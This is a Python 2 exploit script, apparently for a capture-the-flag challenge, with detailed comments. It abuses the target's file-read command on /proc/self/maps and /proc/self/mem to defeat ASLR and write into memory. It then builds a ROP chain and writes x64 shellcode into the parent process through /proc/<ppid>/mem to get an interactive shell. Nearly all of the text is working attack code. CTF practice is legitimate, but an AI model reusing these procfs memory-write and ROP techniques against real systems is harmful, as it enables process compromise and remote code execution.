import sys
import phun

# CTF exploit script (Python 2: print statements, str payloads).
#
# Primitive abused: the target offers a "read" command ('r') that takes a
# filename, a seek offset and a byte count. Pointing it at procfs gives
#   * /proc/self/maps  -> ASLR leak (binary, libc, heap, stack bases),
#   * /proc/self/stat  -> pid / ppid,
#   * /proc/self/mem   -> arbitrary read AND (via the same path) write into
#                         the process's own memory,
#   * /proc/<ppid>/mem -> write into the parent process.
# Every address below is therefore reconstructed from leaks; the only
# hard-coded values are libc/binary offsets that differ per build (see the
# local/remote branches). `phun` is a project-local pwn helper (Remote, p64,
# u64, sh, shell); its API is not visible here, so the comments on its calls
# are assumptions.


def sendit(r,fn,seek=0,cnt=0,end=False,has_epi=True):
    """Drive one round of the target's 'r' (read file) command.

    Walks the four prompts (command, filename, seek, count), each of which is
    assumed to end with '?\\n' (r.read presumably reads up to that marker —
    confirm in phun), and returns whatever the target prints before its
    'quit' prompt.

    Args:
        r:       phun.Remote connection.
        fn:      filename to send; may be oversized/binary (used as a payload
                 for the final write, see the bottom of the script).
        seek:    seek offset, sent as a decimal string.
        cnt:     byte count. An int is sent as its decimal string; anything
                 else (a str payload) is sent verbatim. NOTE: `type(cnt) == int`
                 does not match a Python 2 `long`, so an int > sys.maxint
                 would be sent through r.sendline unconverted.
        end:     answer 'y' to the 'quit' prompt (terminate) instead of 'n'.
        has_epi: whether to first consume a line ending in 'bytes\\n' (the
                 count echo); set False when the payload corrupts that
                 output.

    Returns:
        The raw data read up to (and presumably including) 'quit'.
    """
    r.read('?\n')
    r.sendline('r')
    r.read('?\n')
    r.sendline(fn)
    r.read('?\n')
    r.sendline(str(seek))
    r.read('?\n')
    r.sendline(str(cnt) if type(cnt) == int else cnt)
    if has_epi:
        r.read('bytes\n')
    ret= r.read('quit')
    r.sendline('y' if end else 'n')
    return ret


# '-l' selects the local test instance; any other argument selects the live
# target. NOTE: running with no argument raises IndexError on sys.argv[1].
local = sys.argv[1] == '-l'
if local:
    r = phun.Remote('localhost',1234)
    FD = 5
    # libc-relative offsets for the local libc build.
    hook_off = 0x398ad0
    rop0_off = 0x36a74
    off_pop_rdx_rsi = 0xf5009
    off_pop_r8 = 0x112476
    off_pop_r14 = 0x1fbc9
    off_pop_rax = 0x36018
    off_pop_rcx = 0x2d753
    off_pop_rbx = 0x29179
    off_movr14_callebx = 0x21092
else:
    r = phun.Remote('104.155.105.0',14000)
    FD = 3
    # Same offsets for the remote libc build. Only hook_off, rop0_off and
    # off_pop_rdx_rsi are actually used below; the other gadget offsets are
    # left over from an earlier chain and are never referenced.
    hook_off = 0x3bdaf0
    rop0_off = 0x3aa94
    off_pop_rdx_rsi = 0x1115b9
    off_pop_r8 = 0x131c06
    off_pop_r14 = 0x229a4
    off_pop_rax = 0x1d5f8
    off_pop_rcx = 0x1a5298
    off_pop_rbx = 0x2a369
    off_movr14_callebx = 0x2172a

## get me some maps
# ASLR defeat: dump /proc/self/maps and take the start address of the first
# matching mapping for each region. The count (9086) is a fixed guess at the
# size of the maps file; if it is too small the later entries are missed and
# one of the bases stays None (hex(None) then raises).
maps = sendit(r,'/proc/self/maps',cnt=9086)
base = libc = heap = stack = ostack = None
#print maps
for line in maps.split("\n"):
    if '/libc' in line and not libc:
        libc = int(line.split('-')[0],16)
    elif '/chal' in line and not base:
        base = int(line.split('-')[0],16)
    elif '/tea' in line and not base:
        # Alternate binary name (remote vs local build, presumably).
        base = int(line.split('-')[0],16)
    elif '[heap]' in line and not heap:
        heap = int(line.split('-')[0],16)
    elif line.startswith('6f') and not stack:
        # Address-prefix heuristics for an anonymous mapping the exploit
        # calls "stack" (it is NOT the [stack] region, that is `ostack`).
        # Fragile: matches on the textual form of the address, so it depends
        # on this challenge's mmap layout — TODO confirm which mapping this is.
        stack = int(line.split('-')[0],16)
    elif '0-3' in line and not stack:
        stack = int(line.split('-')[0],16)
    elif '[stack]' in line and not ostack:
        ostack = int(line.split('-')[0],16)
print '[+] base',hex(base)
print '[+] heap',hex(heap)
print '[+] libc',hex(libc)
print '[+] stack',hex(stack)

# /proc/self/stat: field 0 is pid, field 3 is ppid. The parent's pid is what
# the final stage targets (/proc/<ppid>/mem), i.e. the exploit breaks out of
# the child into the forking parent. 32 bytes is enough for the first four
# fields only when the comm field (field 1) is short.
data=sendit(r,'/proc/self/stat',cnt=32)
data=data.split(' ')
pid = int(data[0])
ppid = int(data[3])
print '[*] pid: %d ppid: %d' % (pid,ppid)

# Read 0x4000 bytes of the real stack starting 0x1f000 above its base and
# locate a pointer into the `stack` mapping. The qword 0x20 bytes before that
# pointer is treated as a per-run random offset (presumably the target's own
# randomisation of where it places its data — confirm against the binary).
# data.index raises ValueError if the pointer is not in the window.
a = ostack + 0x1f000
data = sendit(r,'/proc/self/mem',seek=a,cnt=0x4000)
off=data.index(phun.p64(stack))
offset = phun.u64(data[off-0x20:off-0x20+8])
print '[+] random offset',hex(offset)
# Address of the target's state that the next write overwrites; the
# constants (-0x1000, +4032) are layout-specific to this binary.
stack_var = stack+offset-0x1000+4032
print '[+] stack_var',hex(stack_var)

# Stage 1: arbitrary write into our own process through /proc/self/mem.
# Layout written at stack_var (phun.p64 with several args packs them all):
#   [0x00] "9" + NUL padding (16 bytes)
#   [0x10] libc + rop0_off      -- the address the later chain pivots to
#   [0x18] zero padding to 0x30
#   [0x30] FD                   -- the fd number of the opened file (3 remote,
#                                  5 local — differs by how many fds the
#                                  harness already holds open)
#   [0x38] libc + hook_off      -- __malloc_hook address, presumably used as
#                                  the destination of the program's next write
# Which program fields these map to is inferred, not visible here — confirm.
malloc_hook = libc + hook_off
rop_begin = libc + rop0_off
payload = ('9'.ljust(16,"\x00") + phun.p64(rop_begin)).ljust(0x30)
payload += phun.p64(FD,malloc_hook)
sendit(r,'/proc/self/mem',seek=stack_var,cnt=payload)

# Stage 2: ROP chain + shellcode. `base + 0x24a3` is used as a one-argument
# setter gadget before every call (presumably `pop rdi; ret`) and the
# `base + 0x...` call targets look like PLT stubs; the rdx/rsi pairs are set
# with the libc pop gadget. Reading the chain as (rdi, rsi, rdx) -> call:
#   (0xffffffff00000002) -> base+0xaa0       ; twice, with 2 then 3
#   (0xffffffff00000003) -> base+0xaa0
#   (stack_var+0x100 [="/proc/<ppid>/mem"], 2, 0) -> base+0xaf8   ; open-like
#   (2, base+0xa60, 0) -> base+0xa98
#   (2, stack_var+0x110 [=shellcode], len(sh)) -> base+0xA78       ; write-like
#   -> base+0x1E4D
# Gadget identities are NOT established by this file — verify in the binary
# before reuse. The chain is padded to 0x100 with NOPs, then the parent's
# mem path (at +0x100) and the x64 shellcode (at +0x110) follow.
sh = phun.sh('x64')
rop = phun.p64(*[
    base + 0x24a3, 0xffFFffFF << 32 | 2,base + 0xaa0,
    base + 0x24a3, 0xffFFffFF << 32 | 3,base + 0xaa0,
    base + 0x24a3, stack_var + 0x100,
    libc + off_pop_rdx_rsi, 0, 2, base + 0xaf8,
    base + 0x24a3, 2,
    libc + off_pop_rdx_rsi, 0, base + 0xa60, base + 0xa98,
    base + 0x24a3, 2,
    libc + off_pop_rdx_rsi, len(sh), stack_var + 0x110, base + 0xA78,
    base + 0x1E4D
]).ljust(0x100,"\x90") + ('/proc/%d/mem' % ppid).ljust(16,"\x00") + sh
# Filename answer: the parent's mem file, NUL-padded to 52 bytes, then the
# qword 2 — the trailing qword lands past the name buffer (layout-specific).
fname = ('/proc/%d/mem'%ppid).ljust(52,"\x00") + phun.p64(2)
# Count answer: a valid-looking "128" followed by a NUL, 12 bytes of filler,
# then the chain. Both oversized answers presumably overflow fixed-size
# buffers in the target; the seek is the libc base so the write through
# /proc/<ppid>/mem lands in the parent's libc. has_epi=False because the
# corrupted count is not echoed back normally.
payload = "128\x00" + "A"*12 + rop
#mmap_rop()
sendit(r,fname,seek=libc,cnt=payload,has_epi=False)
r.shell()